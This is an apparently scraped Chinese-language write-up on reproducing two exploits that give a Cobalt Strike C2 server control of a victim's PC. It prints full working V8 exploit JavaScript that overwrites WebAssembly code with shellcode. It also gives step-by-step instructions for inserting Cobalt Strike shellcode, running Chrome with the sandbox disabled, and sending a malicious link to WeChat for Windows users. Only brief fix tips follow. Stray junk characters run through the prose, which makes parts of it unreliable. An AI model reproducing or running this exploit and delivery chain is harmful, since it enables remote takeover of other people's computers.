一友酱、 Chrome漏洞上線cs
參考:https://mp.weixin.qq.com/s/LOpAu8vs8ob85W3sCmXMew
1糙及、使用以下腳本,保存為chrome.html格式
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [];
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var main = wasmInstance.exports.main;
var bf = new ArrayBuffer(8);
var bfView = new DataView(bf);
function fLow(f) {
bfView.setFloat64(0, f, true);
return (bfView.getUint32(0, true));
}
function fHi(f) {
bfView.setFloat64(0, f, true);
return (bfView.getUint32(4, true))
}
function i2f(low, hi) {
bfView.setUint32(0, low, true);
bfView.setUint32(4, hi, true);
return bfView.getFloat64(0, true);
}
function f2big(f) {
bfView.setFloat64(0, f, true);
return bfView.getBigUint64(0, true);
}
function big2f(b) {
bfView.setBigUint64(0, b, true);
return bfView.getFloat64(0, true);
}
class LeakArrayBuffer extends ArrayBuffer {
constructor(size) {
super(size);
this.slot = 0xb33f;
}
}
function foo(a) {
let x = -1;
if (a) x = 0xFFFFFFFF;
var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
arr.shift();
let local_arr = Array(2);
local_arr[0] = 5.1;//4014666666666666
let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
arr[0] = 0x1122;
return [arr, local_arr, buff];
}
for (var i = 0; i < 0x10000; ++i)
foo(false);
gc(); gc();
[corrput_arr, rwarr, corrupt_buff] = foo(true);
corrput_arr[12] = 0x22444;
delete corrput_arr;
function setbackingStore(hi, low) {
rwarr[4] = i2f(fLow(rwarr[4]), hi);
rwarr[5] = i2f(low, fHi(rwarr[5]));
}
function leakObjLow(o) {
corrupt_buff.slot = o;
return (fLow(rwarr[9]) - 1);
}
let corrupt_view = new DataView(corrupt_buff);
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
let delta = baseAddr + 0x1c - idx0Addr;
if ((delta % 8) == 0) {
let baseIdx = delta / 8;
this.base = fLow(rwarr[baseIdx]);
} else {
let baseIdx = ((delta - (delta % 8)) / 8);
this.base = fHi(rwarr[baseIdx]);
}
let wasmInsAddr = leakObjLow(wasmInstance);
setbackingStore(wasmInsAddr, this.base);
let code_entry = corrupt_view.getFloat64(13 * 8, true);
setbackingStore(fLow(code_entry), fHi(code_entry));
for (let i = 0; i < shellcode.length; i++) {
corrupt_view.setUint8(i, shellcode[i]);
}
main();
</script>
2惋戏、打開(kāi)cobaltstrike,設(shè)置一個(gè)監(jiān)聽(tīng)http或https的都可以https的相對(duì)穩(wěn)定,這里使用http
3垛贤、使用cs生成payload,監(jiān)聽(tīng)器選擇上一步生成的趣倾,輸出選擇C聘惦,然后勾選上X64 payload。
4儒恋、打開(kāi)生成的payload取出 shellcode 部分 使用全局替換功能將“”為改為 “,0”善绎。
5黔漂、將替換好的shellcode拿出來(lái)放入到chrome.html中的shellcode中
6、在桌面Google快捷方式中右鍵屬性在“目標(biāo)”處加上--no-sandbox參數(shù)關(guān)閉沙箱
7禀酱、在google中打開(kāi)chrome.html文件炬守,可以看到cs成功上線。
成功上線
8剂跟、臨時(shí)修復(fù)方案:
①减途、建議不要點(diǎn)擊別人發(fā)送的快捷方式
②、不要開(kāi)啟Google沙箱
二曹洽、WX上線CS
0x01漏洞介紹
攻擊者可以通過(guò)微信發(fā)送一個(gè)特制的web鏈接观蜗,用戶一旦點(diǎn)擊鏈接,Windows版微信便會(huì)加載執(zhí)行攻擊者構(gòu)造惡意代碼衣洁,最終使攻擊者控制用戶PC墓捻。
攻擊者可以利用此漏洞執(zhí)行任意代碼,控制用戶PC坊夫,存在極大的危害砖第。
0x02影響版本
Windows版微信: 小于等于3.2.1.141版本
0x03漏洞復(fù)現(xiàn)
1、搭建cs环凿,設(shè)置一個(gè)http或https的監(jiān)聽(tīng)器
2梧兼、生成payload,選擇上一步的監(jiān)聽(tīng)器智听,輸出選擇C#羽杰,我這里就不勾選x64了,點(diǎn)擊生成到推,將生成的文件保存到桌面考赛。
3、使用兩個(gè)腳本莉测,修改color.js中的shellcode為cs生成的shellcode
4颜骤、然后搭建一個(gè)http服務(wù)器可以使用python開(kāi)啟也可以直接使用apache,然后發(fā)送到微信上點(diǎn)擊捣卤,cs上線成功
查看cs成功上線
5忍抽、查看本次復(fù)現(xiàn)wx版本
6、修復(fù)建議:
①董朝、將Windows版本微信更新到3.2.1.141以上的最新版本鸠项。
②、建議不要亂點(diǎn)別人發(fā)送的鏈接子姜。